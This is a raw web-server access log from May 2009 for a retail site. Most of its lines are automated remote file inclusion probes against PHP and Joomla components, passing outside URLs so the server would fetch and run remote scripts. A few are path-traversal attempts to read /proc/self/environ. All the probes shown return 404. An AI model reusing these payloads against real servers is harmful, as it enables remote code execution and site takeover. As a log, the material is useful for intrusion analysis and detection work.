124.0.54.98 - - [13/May/2009:07:02:07 -0400] "GET /logs/access_log.Q109010100/index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:07:02:07 -0400] "GET /index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:07:02:08 -0400] "GET /logs/index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
200.32.100.130 - - [13/May/2009:07:02:15 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:15 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:15 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:15 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:15 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:18 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:20 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:20 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:23 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:23 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:23 -0400] "GET /logs/access_log.Q108060900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:23 -0400] "GET /logs/access_log.Q108032100%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:26 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:35 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:35 -0400] "GET /logs/access_log.Q108060900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:38 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:38 -0400] "GET /logs/access_log.Q108032100/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.227.156.113 - - [13/May/2009:07:02:39 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://arteweb.com.mx/phpdemos/ss.txt??%0D? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
67.227.156.113 - - [13/May/2009:07:02:39 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://arteweb.com.mx/phpdemos/ss.txt??%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
67.227.156.113 - - [13/May/2009:07:02:39 -0400] "GET /logs/access_log.Q108061000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://arteweb.com.mx/phpdemos/ss.txt??%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.32.100.130 - - [13/May/2009:07:02:40 -0400] "GET /logs/access_log.Q108081200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:02:40 -0400] "GET /logs/access_log.Q108012500/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.227.156.113 - - [13/May/2009:07:02:42 -0400] "GET /logs/access_log.Q108100700//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://arteweb.com.mx/phpdemos/ss.txt??%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
124.0.54.98 - - [13/May/2009:07:02:43 -0400] "GET /logs/access_log.Q108122100/index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:07:02:48 -0400] "GET /logs/access_log.Q108122100/index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:07:02:50 -0400] "GET /logs/access_log.Q108120400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
200.32.100.130 - - [13/May/2009:07:03:07 -0400] "GET /logs/access_log.Q108030100/convert/mvcw.php?vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:03:07 -0400] "GET /convert/mvcw.php?vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:03:07 -0400] "GET /logs/access_log.Q108050200/convert/mvcw.php?vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.204.0.222 - - [13/May/2009:07:03:08 -0400] "GET /logs/access_log.Q108120400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
200.32.100.130 - - [13/May/2009:07:03:10 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:07:03:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:03:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:03:17 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.119.158.133 - - [13/May/2009:07:03:21 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.125.64.38 - - [13/May/2009:07:03:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
202.89.33.167 - - [13/May/2009:07:03:38 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:03:39 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:03:39 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:07:03:40 -0400] "GET /logs/access_log.Q109020600//include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:40 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:41 -0400] "GET //include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:42 -0400] "GET /logs/error_log.Q109020600//include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:43 -0400] "GET /logs/access_log.Q109020600//include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:43 -0400] "GET //include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:44 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:03:44 -0400] "GET /logs/error_log.Q109020600//include/footer.php?_path[counter]=http://www.wdpa.org.tw/html/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:07:03:50 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.119.158.133 - - [13/May/2009:07:03:53 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.237.82.158 - - [13/May/2009:07:03:56 -0400] "GET /logs/access_log.Q108122500%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
72.30.79.49 - - [13/May/2009:07:04:16 -0400] "GET /logs/access_log.Q108112100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.165.73.157 - - [13/May/2009:07:04:19 -0400] "GET /logs/access_log.Q108122500%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
207.57.79.26 - - [13/May/2009:07:04:20 -0400] "GET /logs/errors.php?error=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.825"
207.57.79.26 - - [13/May/2009:07:04:21 -0400] "GET /errors.php?error=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.825"
121.165.73.157 - - [13/May/2009:07:04:22 -0400] "GET /logs/access_log.Q108122500%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:07:04:24 -0400] "GET /logs/access_log.Q108122500%20/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.185.20.88 - - [13/May/2009:07:04:57 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
24.227.40.189 - - [13/May/2009:07:05:07 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:05:29 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:05:37 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.227.156.113 - - [13/May/2009:07:05:38 -0400] "GET /logs/access_log.Q109011800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://arteweb.com.mx/phpdemos/ss.txt??%0D? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
155.212.232.66 - - [13/May/2009:07:05:49 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [13/May/2009:07:05:49 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [13/May/2009:07:05:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [13/May/2009:07:05:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
217.147.29.190 - - [13/May/2009:07:05:57 -0400] "GET /logs/access_log.Q108093000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:05:57 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:07:05:57 -0400] "GET /logs/access_log.Q108061300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.29.190 - - [13/May/2009:07:05:57 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:06:00 -0400] "GET /logs/access_log.Q108111200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
65.98.59.178 - - [13/May/2009:07:06:03 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
65.98.59.178 - - [13/May/2009:07:06:03 -0400] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.98.59.178 - - [13/May/2009:07:06:03 -0400] "GET /logs/access_log.Q108100900/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.98.59.178 - - [13/May/2009:07:06:32 -0400] "GET /logs/access_log.Q108102400/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:02 -0400] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:02 -0400] "GET /logs/access_log.Q109011400//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:02 -0400] "GET /logs/access_log.Q108060200//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:02 -0400] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:08 -0400] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:08 -0400] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:08 -0400] "GET /logs/access_log.Q109011400//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:08 -0400] "GET /logs/access_log.Q108060200//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:10 -0400] "GET /logs/access_log.Q109011400//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:10 -0400] "GET /logs/access_log.Q108060200//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:10 -0400] "GET //components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:07:10 -0400] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:07:07:29 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:07:43 -0400] "GET /logs/access_log.Q108111200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.147.29.190 - - [13/May/2009:07:07:43 -0400] "GET /logs/access_log.Q108093000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.98.59.178 - - [13/May/2009:07:07:48 -0400] "GET /logs/access_log.Q108100900%20%20/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.98.59.178 - - [13/May/2009:07:07:58 -0400] "GET /logs/access_log.Q108102400%20%20/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:08:21 -0400] "GET //BaseAdmin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:08:21 -0400] "GET /logs//BaseAdmin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:07:08:21 -0400] "GET /logs/access_log.Q109022600//BaseAdmin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
153.2.247.34 - - [13/May/2009:07:08:47 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):3231000 HTTP/1.0" 200 45674 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
153.2.247.34 - - [13/May/2009:07:08:49 -0400] "GET /images/items/3231000_THUMB.JPG HTTP/1.0" 200 3373 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):3231000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
202.89.33.167 - - [13/May/2009:07:08:59 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:09:37 -0400] "GET /logs/access_log.Q109011400%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:09:38 -0400] "GET /logs/access_log.Q108060200%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:09:43 -0400] "GET /logs/access_log.Q109011400%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:09:43 -0400] "GET /logs/access_log.Q108060200%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:09:45 -0400] "GET /logs/access_log.Q109011400%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:07:09:45 -0400] "GET /logs/access_log.Q108060200%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:09:53 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:09:53 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:09:53 -0400] "GET /logs/access_log.Q109022200%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.22.204.90 - - [13/May/2009:07:09:57 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.76"
203.22.204.90 - - [13/May/2009:07:09:57 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
77.221.130.12 - - [13/May/2009:07:09:57 -0400] "GET /logs/access_log.Q108070200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
203.22.204.90 - - [13/May/2009:07:09:57 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.76"
77.221.130.12 - - [13/May/2009:07:09:57 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
